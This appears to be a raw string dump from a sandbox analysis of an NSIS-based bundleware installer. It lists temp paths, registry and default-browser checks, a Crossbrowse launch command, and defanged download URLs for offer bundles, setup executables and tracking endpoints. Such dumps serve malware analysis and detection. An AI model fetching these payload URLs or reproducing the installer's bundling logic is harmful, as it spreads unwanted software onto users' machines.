C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp
ware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
Nullsoft Install System v11-Jul-2014.cvs
GetProcessHeap
OLEAUT32.dll
WININET.dll
MSVCRT.dll
nsWeb.dll
6(7.767;7
4<.pd>
q.ya!
%u X`i@
_$,ZS.db
o7.6.3
0*%UP
nsd40.tmp
0.html?
://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
0~hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1830104
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
{E1070104-F404-44CE-B556-0622F9D63EE5}
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
ft Windows XP
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsq3D.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
3342534
1628046245
1835300
3539204
2031872
2097470
3408180
2621714
3277082
3342566
3276996
2425094
194.242.96.218_2015-09-02_02:40:01
460~hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1638640
1845822391
2490616
hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.php
hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php
"%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe" -- "%1"
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip
hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe
hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip
O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
RE3|Opera Software
Opera
.96.218_2015-09-02_02:40:01
iliateId.php
mote.php
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp\FirstResult.txt
76#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
tp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip
7970.exe
l.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0
up_17970.exe~null~0~0~0
ault,RE2|Opera Software,RE3|Opera Software
/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
)-.Yln
Nullsoft Install System v11-Jul-2014.cvs
hXXp://VVV.microsoft.com
nsq3D.tmp_240_rwx_10004000_00001000:
callback%d
3>